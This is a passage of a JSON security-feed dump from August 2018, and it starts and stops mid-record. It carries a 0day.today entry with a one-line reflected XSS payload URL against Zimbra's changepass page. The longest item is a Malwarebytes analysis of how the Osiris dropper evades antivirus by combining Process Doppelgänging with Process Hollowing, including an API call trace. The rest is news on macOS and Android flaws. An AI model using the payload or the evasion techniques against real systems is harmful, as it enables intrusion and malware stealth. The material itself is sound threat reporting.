["CVE-2016-3411"], "modified": "2018-08-11T00:00:00", "id": "1337DAY-ID-30864", "href": "https://0day.today/exploit/description/30864", "sourceData": "# Exploit Title: Xss Zimbra Mail server\r\n# Exploit Author: Dinbar78\r\n# Vendor Homepage: https://www.zimbra.com/\r\n \r\n# Version: 8.6.0_GA_1153 (build 20141215151110)\r\n# bug 103609 or CVE-2016-3411\r\n \r\n \r\nPayload: es.\r\nhttps:// (zimbrasite)/h/changepass?skin=\"><script>alert('hacked');</script>\n\n# 0day.today [2018-08-12] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/30864"}], "qualysblog": [{"lastseen": "2018-08-13T20:31:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "WannaCry rears its ugly head again. Reddit gets hacked, despite using two-factor authentication. A cryptojacking campaign targets carrier-grade routers. Here are some recent security industry news that have caught our attention. WannaCry hits Taiwan Semi The notorious WannaCry ransomware re-appeared recently, when Taiwan Semiconductor Manufacturing, a chip supplier to Apple and other smartphone...\n\n[Source](<https://blog.qualys.com/news/2018/08/13/security-news-wannacry-surfaces-in-taiwan-as-reddit-breach-puts-2fa-in-the-spotlight>)", "reporter": "Juan C. Perez", "published": "2018-08-13T19:26:48", "type": "qualysblog", "title": "Security News: WannaCry Surfaces in Taiwan, as Reddit Breach Puts 2FA in the Spotlight", "enchantments": {"score": {"modified": "2018-08-13T20:31:03", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-13T19:26:48", "id": "QUALYSBLOG:477807BA00047C747EDC16769667F9D6", "href": "https://blog.qualys.com/news/2018/08/13/security-news-wannacry-surfaces-in-taiwan-as-reddit-breach-puts-2fa-in-the-spotlight", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-08-14T03:12:35", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "One of the Holly Grails for malware authors is a perfect way to impersonate a legitimate process. That would allow them to run their malicious module under the cover, being unnoticed by antivirus products. Over the years, various techniques have emerged in helping them to get closer to this goal. This topic is also interesting for researchers and reverse engineers, as it shows creative ways of using Windows APIs.\n\n[Process Doppelg\u00e4nging](<https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/>), a new technique of impersonating a process, was published last year at the [Black Hat conference](<https://www.youtube.com/watch?v=Cch8dvp836w>). After some time, a ransomware named [SynAck was found adopting that technique](<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>) for malicious purposes. Even though Process Doppelg\u00e4nging still remains rare in the wild, we recently discovered some of its traits in the dropper for the Osiris banking Trojan ([a new version of the infamous Kronos](<https://www.proofpoint.com/us/threat-insight/post/kronos-reborn>)). After closer examination, we found out that the original technique was further customized.\n\nIndeed, the malware authors have merged elements from both Process Doppelg\u00e4nging and Process Hollowing, picking the best parts of both techniques to create a more powerful combo. In this post, we take a closer look at how Osiris is deployed on victim machines, thanks to this interesting loader.\n\n### Overview\n\nOsiris is loaded in three steps as pictured in the diagram below:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/diagram_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/diagram_.png> \"\" )\n\nThe first stage loader is the one that was inspired by the Process Doppelg\u00e4nging technique but with an unexpected twist. Finally, Osiris proper is delivered thanks to a second stage loader.\n\n### Loading additional NTDLL\n\nWhen ran, the initial dropper creates a new suspended process, wermgr.exe.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/dropper_run-1.png)\n\nLooking into the modules loaded within the injector's process space, we can see this additional copy of NTDLL:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/added_ntdll-1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/added_ntdll-1_.png> \"\" )\n\nThis is a well-known technique that some malware authors use in order to evade monitoring applications and hide the API calls that they use. When we closely examine what functions are called from that additional NTDLL, we find more interesting details. It calls several APIs related to NTFS transactions. It was easy to guess that the technique of Process Doppelg\u00e4nging, which relies on this mechanism, was applied here.\n\nNTDLL is a special, low-level DLL. Basically, it is just a wrapper around [syscalls](<https://en.wikipedia.org/wiki/System_call>). It does not have any dependencies from other DLLs in the system. Thanks to this, it can be loaded conveniently, without the need to fill its import table.\n\nOther system DLLs, such as Kernel32, rely heavily on functions exported from NTDLL. This is why many user-land monitoring tools hook and intercept the functions exported by NTDLL: to watch what functions are being called and check if the process does not display any suspicious activity.\n\nOf course malware authors know about this, so sometimes, in order to fool this mechanism, they load their own, fresh and unhooked copy of NTDLL from disk. There are several ways to implement this. Let's have a look how the authors of the Osiris dropper did it.\n\nLooking at the memory mapping, we see that the additional NTDLL is loaded as an image, just like other DLLs. This type of mapping is typical for DLLs loaded by `LoadLibrary` function or its low-level version from NTDLL, `LdrLoadDll`. But NTDLL is loaded by default in every executable, and loading the same DLL twice is impossible by the official API.\n\nUsually, malware authors decide to map the second copy manually, but that gives a different mapping type and stands out from the normally-loaded DLLs. Here, the authors made a workaround: they loaded the file as a section, using the following functions:\n\n * `ntdll.NtCreateFile` - to open the ntdll.dll file\n * `ntdll.[NtCreateSection](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-zwcreatesection>)` - to create a section out of this file\n * `ntdll.ZwMapViewOfSection` - to map this section into the process address space\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_and_map_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_and_map_.png> \"\" )\n\nThis was a smart move because the DLL is mapped as an image, so it looks like it was loaded in a typical way.\n\nThis DLL was further used to make the payload injection more stealthy. Having their fresh copy of NTDLL, they were sure that the functions used from there are not hooked by security products.\n\n#### Comparison with Process Doppelg\u00e4nging and Process Hollowing\n\nThe way in which the loader injects the payload into a new process displays some significant similarities with Process Doppleg\u00e4nging. However, if we analyze it very carefully, we can see also differences from the classic implementation proposed last year at Black Hat. The differing elements are closer to Process Hollowing.\n\nClassic Process Doppelg\u00e4nging:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/dopel1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/dopel1_.png> \"\" )\n\nProcess Hollowing:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/hollowing1-1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/hollowing1-1_.png> \"\" )\n\nOsiris Loader:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/osildr1-2_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/osildr1-2_.png> \"\" )\n\n### Creating a new process\n\nThe Osiris loader starts by creating the process into which it is going to inject. The process is created by a function from Kernel32: CreateProcessInternalW:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_internal_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_internal_.png> \"\" )\n\nThe new process (wermgr.exe) is created in a suspended state from the original file. So far, it reminds us of Process Hollowing, a much older technique of process impersonation.\n\nIn the Process Doppleg\u00e4nging algorithm, the step of creating the new process is taken much later and uses a different, undocumented API: NtCreateProcessEx:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_.png> \"\" )\n\nThis difference is significant, because in Process Doppelg\u00e4nging, the new process is created not from the original file, but from a special buffer (section). This section was supposed to be created earlier, using an \"invisible\" file created within the NTFS transaction. In the Osiris loader, this part also occurs, but the order is turned upside down, making us question if we can call it the same algorithm.\n\nAfter the process is created, the same image (wermgr.exe) is mapped into the context of the loader, just like it was previously done with NTDLL.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/mapped_wermgr_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/mapped_wermgr_.png> \"\" )\n\nAs it later turns out, the loader will patch the remote process. The local copy of the wermgr.exe will be used to gather information about where the patches should be applied.\n\n### Usage of NTFS transactions\n\nLet's start from having a brief look at what are the NTFS transactions. This mechanism is commonly used while operating on databases\u2014in a similar way, they exist in the NTFS file system. The NTFS transactions encapsulate a series of operations into a single unit. When the file is created inside the transaction, nothing from outside can have access to it until the transaction is committed. Process Doppelg\u00e4nging uses them in order to create invisible files where the payload is dropped.\n\nIn the analyzed case, the usage of NTFS transactions is exactly the same. We can spot only small differences in the APIs used. The loader creates a new transaction, within which a new file is created. The original implementation used `CreateTransaction` and `CreateFileTransacted` from Kernel32. Here, they were substituted by low-level equivalents. \n\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_current_transaction_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_current_transaction_.png> \"\" )\n\nFirst, a function `ZwCreateTransaction` from a NTDLL is called. Then, instead of `CreateFileTransacted`, the authors [open the transacted file](<http://microsoft.public.win32.programmer.kernel.narkive.com/MH2k9XfA/ntfs-transaction-using-native-functions-in-user-mode>) by `RtlSetCurrentTransaction` along with `ZwCreateFile` (the created file is %TEMP%\\\\\\Liebert.bmp). Then, the dropper writes a buffer into to the file. Analogically, `RtlSetCurrentTransaction` with `ZwWriteFile` is used.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/write_file-1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/write_file-1_.png> \"\" )\n\nWe can see that the buffer that is being written contains the new PE file: the second stage payload. Typically for this technique, the file is visible only within the transaction and cannot be opened by other processes, such as AV scanners.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_section_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_section_.png> \"\" )\n\nThis transacted file is then used to create a section. The function that can do it is available only via low-level API: ZwCreateSection/NtCreateSection.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/rollback_transaction_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/rollback_transaction_.png> \"\" )\n\nAfter the section is created, that file is no longer needed. The transaction gets rolled back (by `ZwRollbackTransaction`), and the changes to the file are never saved on the disk.\n\nSo, the part described above is identical to the analogical part of Process Doppelg\u00e4nging. Authors of the dropper made it even more stealthy by using low-level equivalents of the functions, called from a custom copy of NTDLL.\n\n### From a section to a process\n\nAt this point, the Osiris dropper creates two completely unrelated elements:\n\n * A process (at this moment containing a mapped, legitimate executable wermgr.exe)\n * A section (created from the transacted file) and containing the malicious payload\n\nIf this were typical Process Doppelg\u00e4nging, this situation would never occur, and we would have the process created directly based on the section with the mapped payload. So, the question arises, how did the author of the dropper decide to merge the elements together at this point?\n\nIf we trace the execution, we can see following function being called, just after the transaction is rolled back (format: RVA;function):\n \n \n 4b1e6;ntdll_1.ZwQuerySection\n 4b22b;ntdll.NtClose\n 4b239;ntdll.NtClose\n 4aab8;ntdll_1.ZwMapViewOfSection\n 4af27;ntdll_1.ZwProtectVirtualMemory\n 4af5b;ntdll_1.ZwWriteVirtualMemory\n 4af8a;ntdll_1.ZwProtectVirtualMemory\n 4b01c;ntdll_1.ZwWriteVirtualMemory\n 4b03a;ntdll_1.ZwResumeThread\n \n\nSo, it looks like the newly created section is just mapped into the new process as an additional module. After writing the payload into memory and setting the necessary patches, such as Entry Point redirection, the process is resumed:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/resume_proc_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/resume_proc_.png> \"\" )\n\nThe way in which the execution was redirected looks similar to variants of Process Hollowing. [The PEB of the remote process is patched](<https://github.com/hasherezade/demos/blob/master/run_pe/src/runpe.h#L127>), and the new module base is set to the added section. (Thanks to this, imports will get loaded automatically when the process resumes.)\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/patching_peb_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/patching_peb_.png> \"\" )\n\nThe Entry Point redirection is, however, done just by a patch at the Entry Point address of the original module. A single jump redirects to the Entry Point of the injected module:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/patched_ep-1.png)\n\nIn case patching the Entry Point has failed, the loader contains a second variant of Entry Point redirection, by setting the new address in the thread context (ZwGetThreadContext -&gt; ZwSetThreadContext), which is [a classic technique used in Process Hollowing](<https://github.com/hasherezade/demos/blob/master/run_pe/src/runpe.h#L139>):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_context_-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_context_-1.png> \"\" )\n\n### Best of both worlds\n\nAs we can see, the author merged some elements of Process Doppelg\u00e4nging with some elements of Process Hollowing. This choice was not accidental. Both of those techniques have strong and weak points, but by merging them together, we get a power combo.\n\nThe weakest point of Process Hollowing is about the protection rights set on the memory space where the payload is injected (more info [here](<https://youtu.be/Cch8dvp836w?t=569>)). Process Hollowing allocates memory pages in the remote process by VirtualAllocEx, then writes the payload there. It gives one undesirable effect: the access rights (MEM_PRIVATE) were different than in the executable that is normally loaded (MEM_IMAGE).\n\nExample of a payload loaded using Process Hollowing:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/hollowing_example-2.png)\n\nThe major obstacle in loading the payload as an image is that, to do so, it has to be first dropped on the disk. Of course we cannot do this, because once dropped, it would easily be picked by an antivirus.\n\nProcess Doppelg\u00e4nging on the other hand provides a solution: invisible transacted files, where the payload can be safely dropped without being noticed. This technique assumes that the transacted file will be used to create a section (MEM_IMAGE), and then this section will become a base of the new process ([using NtCreateProcessEx](<https://github.com/hasherezade/process_doppelganging/blob/master/main.cpp#L196>)).\n\nExample of a payload loaded using Process Doppelg\u00e4nging:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/doppel_example.png)\n\nThis solution works well, but requires that all the process parameters have to be also loaded manually: first creating them by [RtlCreateProcessParametersEx and then setting them into the remote PEB](<https://github.com/hasherezade/process_doppelganging/blob/master/main.cpp#L76>). It was making it difficult to run a 32-bit process on 64-bit system, because in case of WoW64 processes, there are 2 PEBs to be filled.\n\nThose problems of Process Doppelg\u00e4nging can be solved easily if we create the process just like Process Hollowing does it. Rather than using low-level API, which was the only way to create a new process out of a section, the authors created a process out of the legitimate file, using a documented API from Kernel32. Yet, the section carrying the payload, loaded with proper access rights (MEM_IMAGE), can be added later, and the execution can get redirected to it.\n\n### Second stage loader\n\nThe next layer ([8d58c731f61afe74e9f450cc1c7987be](<https://www.virustotal.com/#/file/40288538ec1b749734cb58f95649bd37509281270225a87597925f606c013f3a/details>)) is not the core yet, but the next stage of the loader. It imports only one DLL, Kernel32.\n\nIts only role is to load the final payload. At this stage, we can hardly find something innovative. The Osiris core is unpacked piece by piece and manually loaded along with its dependencies into a newly-allocated memory area within the loader process.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/final_payload_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/final_payload_.png> \"\" )\n\nAfter this self-injection, the loader jumps into the payload's entry point:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/payload_entry_point_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/payload_entry_point_.png> \"\" )\n\nThe interesting thing is that the application's entry point is different than the entry point saved in the header. So, if we dump the payload and try to run it interdependently, we will not get the same code executed. This is an interesting technique used to misguide researchers.\n\nThis is the entry point that was set in the headers is at RVA 0x26840:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/original_ep_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/original_ep_.png> \"\" )\n\nThe call leads to a function that makes the application go in an infinite sleep loop:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/fake_ep_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/fake_ep_.png> \"\" )\n\nThe real entry point, from which the execution of the malware should start, is at 0x25386, and it is known only to the loader.\n\n#### [![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/osiris_ep_code_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/osiris_ep_code_.png> \"\" )\n\n### The second stage versus Kronos loader\n\nA similar trick using a hidden entry point was used by the original Kronos ([2a550956263a22991c34f076f3160b49](<https://www.hybrid-analysis.com/sample/8389dd850c991127f3b3402dce4201cb693ec0fb7b1e7663fcfa24ef30039851?environmentId=100>)). In Kronos' case, the final payload is injected into svchost. The execution is redirected to the core by patching the entry point in svchost:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/svchost_patch_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/svchost_patch_.png> \"\" )\n\nIn this case, the entry point within the payload is at RVA 0x13B90, while the entry point saved in the payload's header ([d8425578fc2d84513f1f22d3d518e3c3](<https://www.virustotal.com/#/file/258d67283afa5195436b1eaa8d02953785974d3709109ebff3b9b638332df514/details>)) is at 0x15002.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_.png> \"\" )\n\nThe code at the real Kronos entry point displays similarities with the analogical point in Osiris. Yet, we can see they are not identical:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_code_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_code_.png> \"\" )\n\n### A precision implementation\n\nThe first stage loader is strongly inspired by Process Doppleg\u00e4nging and is implemented in a clean and professional way. The author adopted elements from a relatively new technique and made the best out of it by composing it with other known tricks. The precision used here reminds us of the code used in the original Kronos. However, we can't be sure if the first layer is written by the same author as the core bot. Malware distributors often use [third-party crypters](<https://blog.malwarebytes.com/threat-analysis/2015/12/malware-crypters-the-deceptive-first-layer/>) to pack their malware. The second stage is more tightly coupled with the payload, and here we can say with more confidence that this layer was prepared along with the core.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) can protect against this threat early on by breaking its distribution chains that includes malicious documents sent in spam campaigns and drive-by downloads, thanks to our anti-exploit module. Additionally, our anti-malware engine detects both the dropper and Osiris core.\n\n### Indicators of Compromise (IOCs)\n\nStage 1 (original sample)\n \n \n e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0\n\nStage 2 (second stage loader)\n \n \n 40288538ec1b749734cb58f95649bd37509281270225a87597925f606c013f3a\n\nOsiris (core bot)\n \n \n d98a9c5b4b655c6d888ab4cf82db276d9132b09934a58491c642edf1662e831e\n\nThe post [Process Doppelg\u00e4nging meets Process Hollowing in Osiris dropper](<https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "hasherezade", "published": "2018-08-13T18:29:57", "type": "malwarebytes", "title": "Process Doppelg\u00e4nging meets Process Hollowing in Osiris dropper", "enchantments": {"score": {"modified": "2018-08-14T03:12:35", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-13T18:29:57", "id": "MALWAREBYTES:B94255EB54B5F64CE41413CE6220743C", "href": "https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-13T23:12:07", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Last week, we published a [review of exploit kits](<https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/>), talked about everyday tech that can [give you a headache](<https://blog.malwarebytes.com/101/2018/08/8-everyday-technologies-that-can-make-you-vulnerable-to-cyberattacks/>), and showed how to [protect RDP access](<https://blog.malwarebytes.com/security-world/business-security-world/2018/08/protect-rdp-access-ransomware-attacks/>) from ransomware. We also published a study on the [true cost of cybercrime](<https://blog.malwarebytes.com/security-world/2018/08/white-hat-black-hat-emergence-gray-hat-true-costs-cybercrime/>).\n\n### Other news:\n\n * Discovered at Black Hat: WhatsApp \"[message manipulation](<https://www.theregister.co.uk/2018/08/09/whatsapp_message_manipulation/>)\" (Source: The Register)\n * Discovered at Black Hat: [AI attacks](<https://www.theregister.co.uk/2018/08/09/neural_network_malware/>) (Source: The Register)\n * Once again, discovered at Black Hat: [Meltdown panel](<https://www.theregister.co.uk/2018/08/09/meltdown_spectre_cert_timing/>) (Source: The Register)\n * Indeed, discovered at Black Hat: [Mobile payment bugs](<https://www.theregister.co.uk/2018/08/10/mobile_pos_insecurity/>) (Source: The Register)\n * PGA [ransomware attack](<https://golfweek.com/2018/08/08/hackers-target-pga-servers-seek-bitcoin-ransom/>) right before Ryder Cup (Source: Golf Week)\n * Steer clear of [evil JavaScript](<https://blog.apnic.net/2018/08/07/discovering-evasive-code-in-malicious-websites/>) (Source: APNIC)\n * Adding bugs to [deter attackers](<https://arxiv.org/pdf/1808.00659.pdf>) [PDF] (Source: Arxiv)\n * Botnets and [irrigation systems](<https://www.helpnetsecurity.com/2018/08/09/botnet-smart-irrigation-systems/>) (Source: Help Net Security)\n * Hunting [Twitter bots](<https://duo.com/assets/pdf/Duo-Labs-Dont-At-Me-Twitter-Bots.pdf>) at scale (Source: Duo Security)\n * Google to warn of [government-backed attacks](<https://gsuiteupdates.googleblog.com/2018/08/control-government-backed-attack-alerts.html>) (Source: G Suite)\n\nStay safe, everyone!\n\nThe post [A week in security (August 6 \u2013 August 12)](<https://blog.malwarebytes.com/security-world/2018/08/week-security-august-6-12/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Malwarebytes Labs", "published": "2018-08-13T16:37:10", "type": "malwarebytes", "title": "A week in security (August 6 \u2013 August 12)", "enchantments": {"score": {"modified": "2018-08-13T23:12:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-13T16:37:10", "id": "MALWAREBYTES:A5CC3E29981C1A5864EF7560E3EA5F63", "href": "https://blog.malwarebytes.com/security-world/2018/08/week-security-august-6-12/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-08-14T05:12:46", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"], "references": [], "description": "[![programmatic macos mouse click hacking](https://1.bp.blogspot.com/-pMWGpuhsNlw/W3JiuDibBGI/AAAAAAAAx1U/-b18pUk_ZpEfGfxWkt0psycebUfXXn4NgCLcBGAs/s728-e100/macos-mouse-click-hacking.png)](<https://1.bp.blogspot.com/-pMWGpuhsNlw/W3JiuDibBGI/AAAAAAAAx1U/-b18pUk_ZpEfGfxWkt0psycebUfXXn4NgCLcBGAs/s728-e100/macos-mouse-click-hacking.png>)\n\nYour Mac computer running the Apple's latest High Sierra operating system can be hacked by tweaking just two lines of code, a researcher demonstrated at the Def Con security conference on Sunday. \n \nPatrick Wardle, an ex-NSA hacker and now Chief Research Officer of Digita Security, uncovered a critical zero-day vulnerability in the macOS operating system that could allow a malicious application installed in the targeted system to virtually \"click\" objects without any user interaction or consent. \n \nTo know, how dangerous it can go, Wardle [explains](<https://speakerdeck.com/patrickwardle/the-mouse-is-mightier-than-the-sword>): \"Via a single click, countless security mechanisms may be completely bypassed. Run untrusted app? Click...allowed. Authorize keychain access? Click...allowed. Load 3rd-party kernel extension? Click...allowed. Authorize outgoing network connection? click ...allowed.\" \n\n\n \nWardle described his research into \"synthetic\" interactions with a user interface (UI) as \"The Mouse is Mightier than the Sword,\" showcasing an attack that's capable of 'synthetic clicks'\u2014programmatic and invisible mouse clicks that are generated by a software program rather than a human. \n \nmacOS code itself offers synthetic clicks as an accessibility feature for disabled people to interact with the system interface in non-traditional ways, but Apple has put some limitations to block malware from abusing these programmed clicks. \n\n\n[![hacking with mac os](https://1.bp.blogspot.com/-wlyLZozlX6g/W3JjZCUnheI/AAAAAAAAx1c/6Nsk87-aqBkMkqXDpZSb0t1-YBu1EdkmgCLcBGAs/s728-e100/hacking-macos.png)](<https://1.bp.blogspot.com/-wlyLZozlX6g/W3JjZCUnheI/AAAAAAAAx1c/6Nsk87-aqBkMkqXDpZSb0t1-YBu1EdkmgCLcBGAs/s728-e100/hacking-macos.png>)\n\n \nWardle accidentally discovered that High Sierra incorrectly interprets two consecutive synthetic mouse \"down\" event as a legitimate click, allowing attackers to programmatically interact with security warnings as well that asks users to choose between \"allow\" or \"deny\" and access sensitive data or features. \n\n\n> \"The user interface is that single point of failure,\" says Wardle. \"If you have a way to synthetically interact with these alerts, you have a very powerful and generic way to bypass all these security mechanisms.\"\n\nAlthough Wardle has not yet published technical details of the flaw, he says the vulnerability can potentially be exploited to dump all passwords from the keychain or load malicious kernel extensions by virtually clicking \"allow\" on the security prompt and gain full control of a target machine. \n\n\n \nWardle said that he found this loophole accidentally when copying and pasting the code and that just two lines of code are enough to completely break this security mechanism. \n \nUnlike earlier findings, Wardle didn't report Apple about his latest research and choose to publicly reveal details of the zero-day bug at DefCon hacker conference. \n\n\n> \"Of course OS vendors such as Apple are keenly aware of this 'attack' vector, and thus strive to design their UI in a manner that is resistant against synthetic events. Unfortunately, they failed,\" says Wardle.\n\nHowever, the Apple's next version of macOS, Mojave, already has mitigated the threat by blocking all synthetic events, which eventually reduces the scope of accessibility features on applications that legitimately use this feature.\n", "reporter": "The Hacker News", "published": "2018-08-13T16:19:00", "type": "thn", "title": "ex-NSA Hacker Discloses macOS High Sierra Zero-Day Vulnerability", "enchantments": {"score": {"modified": "2018-08-14T05:12:46", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-08-14T05:11:06", "id": "THN:BC9593F75E3497CB8C0AE16E2358A327", "href": "https://thehackernews.com/2018/08/macos-mouse-click-hack.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-13T15:12:32", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[![android-hack](https://1.bp.blogspot.com/-QNbapp4TO4Q/W3GQx3-H8OI/AAAAAAAAx0w/x9jiwYoRv_gEQrZUlbL_rQnh-1yOqCBAACLcBGAs/s728-e100/android-hack.png)](<https://1.bp.blogspot.com/-QNbapp4TO4Q/W3GQx3-H8OI/AAAAAAAAx0w/x9jiwYoRv_gEQrZUlbL_rQnh-1yOqCBAACLcBGAs/s728-e100/android-hack.png>)\n\nBought a new Android phone? What if I say your brand new smartphone can be hacked remotely? \n \nNearly all Android phones come with useless applications pre-installed by manufacturers or carriers, usually called bloatware, and there's nothing you can do if any of them has a backdoor built-in\u2014even if you're careful about avoiding sketchy apps. \n \nThat's exactly what security researchers from mobile security firm Kryptowire demonstrated at the DEF CON security conference on Friday. \n\n\n \nResearchers [disclosed](<https://www.kryptowire.com/portal/android-firmware-defcon-2018/>) details of 47 different vulnerabilities deep inside the firmware and default apps (pre-installed and mostly non-removable) of 25 Android handsets that could allow hackers to spy on users and factory reset their devices, putting millions of Android devices at risk of hacking. \n \nAt least 11 of those vulnerable smartphones are manufactured by companies including Asus, ZTE, LG, and the Essential Phone, and being distributed by US carriers like Verizon and AT&amp;T. \n \nOther major Android handset brands include Vivo, Sony, Nokia, and Oppo, as well as many smaller manufacturers such as Sky, Leagoo, Plum, Orbic, MXQ, Doogee, Coolpad, and Alcatel. \n \nSome vulnerabilities discovered by researchers could even allow hackers to execute arbitrary commands as the system user, wipe all user data from a device, lock users out of their devices, access device's microphone and other functions, access all their data, including their emails and messages, read and modify text messages, sending text messages, and more\u2014all without the users' knowledge. \n\n\n> \"All of these are vulnerabilities that are prepositioned. They come as you get the phone out the box,\" Kryptowire CEO Angelos Stavrou said in a statement. \"That's important because consumers think they're only exposed if they download something that's bad.\"\n\nFor example, vulnerabilities in Asus ZenFone V Live could allow an entire system takeover, allowing attackers to take screenshots and record user\u2019s screen, make phone calls, spying on text messages, and more. \n\n\n \nKryptowire, whose research was funded by the U.S. Department of Homeland Security, explained that these vulnerabilities stem from the open nature of the Android's operating system that allows third-parties like device manufacturers and carriers to modify the code and create completely different versions of Android. \n \nKryptowire is the same security firm that, in late 2016, uncovered a [pre-installed backdoor](<https://thehackernews.com/2016/11/hacking-android-smartphone.html>) in more than 700 Million Android smartphones that surreptitiously found sending all text messages, call log, contact list, location history, and app data to China every 72 hours. \n \nKryptowire has responsibly reported the vulnerabilities to Google and the respective affected Android partners, some of which have patched the issues while others are working diligently and swiftly to address these issues with a patch. \n \nHowever, it should be noted that since the Android operating system itself is not vulnerable to any of the disclosed issues, Google can't do much about this, as it has no control over the third apps pre-installed by manufacturers and carriers.\n", "reporter": "The Hacker News", "published": "2018-08-13T14:13:00", "type": "thn", "title": "Flaws in Pre-Installed Apps Expose Millions of Android Devices to Hackers", "enchantments": {"score": {"modified": "2018-08-13T15:12:32", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-08-13T14:13:56", "id": "THN:34FA8F74B9C065A2BA51C4BAD9B6B900", "href": "https://thehackernews.com/2018/08/android-app-hack.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "ciscothreats": [{"lastseen": "2018-08-13T17:07:57", "_object_types": ["robots.models.cisco.CiscoThreatBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Medium\n\nAlert ID: \n\n58674\n\nFirst Published:\n\n2018 August 13 15:20 GMT\n\nVersion: \n\n1\n\n## \n\nSummary \n\n * Cisco Security has detected significant activity related to spam email messages distributing malicious software. \n \nEmail messages that are related to this threat (RuleID33305) may contain the following files: \n \n**Name** | **Size in Bytes** | **MD5 